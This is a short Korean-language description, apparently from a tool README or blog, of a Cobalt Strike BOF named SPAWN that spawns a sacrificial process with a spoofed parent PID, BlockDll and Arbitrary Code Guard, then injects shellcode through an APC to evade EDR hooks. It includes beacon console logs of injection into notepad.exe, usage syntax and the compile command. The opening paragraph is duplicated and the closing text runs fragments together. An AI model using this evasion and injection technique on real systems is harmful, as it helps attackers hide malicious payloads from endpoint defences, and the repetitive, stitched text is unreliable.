
희생 프로세스를 생성하고, 쉘코드를 주입하여 페이로드를 실행하는 Cobalt Strike BOF입니다. ACG(Arbitrary Code Guard), BlockDll 및 PPID 스푸핑을 사용하여 희생 프로세스를 생성함으로써 EDR/UserLand 후크를 우회하도록 제작되었습니다.
Cobalt Strike BOF로, 희생 프로세스를 생성하고, 쉘코드를 주입한 후 페이로드를 실행합니다. Arbitrary Code Guard(ACG), BlockDll, PPID 스푸핑을 사용하여 희생 프로세스를 생성함으로써 EDR/UserLand 후킹을 우회하도록 설계되었습니다.

beacon> spawn notepad.exe 6248 /Users/bobby.cooke/git/boku7/SPAWN/popCalc.bin
[*] SPAWN (Bobby Cooke//SpiderLabs|@0xBoku|github.com/boku7)
[+] Opened handle 0x534 to process 6248(PID)
[+] Spawned process: notepad.exe | PID: 8404 | PPID: 6248
[+] Allocated RE memory in remote process 8404 (PID) at: 0x00000177A72C0000
[+] Wrote 280 bytes to memory in remote process 8404 (PID) at 0x00000177A72C0000
[+] APC queued for main thread of 8404 (PID) to shellcode address 0x00000177A72C0000
beacon> help
spawn Spawn a process with a spoofed PPID and blockDll
beacon> help spawn
Synopsis: spawn /path/to/exe PPID
beacon> ps
8264 5536 OneDrive.exe x86 1 DESKTOP-KOSR2NO\boku
beacon> spawn cmd.exe 8264
[*] SPAWN (@0xBoku|github.com/boku7)
Opened handle 0x634 to process 8264(PID)
Success! Spawned process: cmd.exe | PID: 5384 | PPID: 8264
blockdll 기능x86_64-w64-mingw32-gcc -c spawn.x64.c -o spawn.x64.o
beacon> spawn /path/to/exe PPID /local/path/to/shellcode.bin

cmd.exe 프로세스가 PPID를 OneDrive.exe로 하여 생성되는 것을 볼 수 있습니다.blockdll 기능 구현
Signatures restricted (Microsoft only)로 생성되었습니다.Signatures restricted (Microsoft only)는 Microsoft에서 서명하지 않은 DLL을 생성된 프로세스에 로드할 수 없도록 합니다.
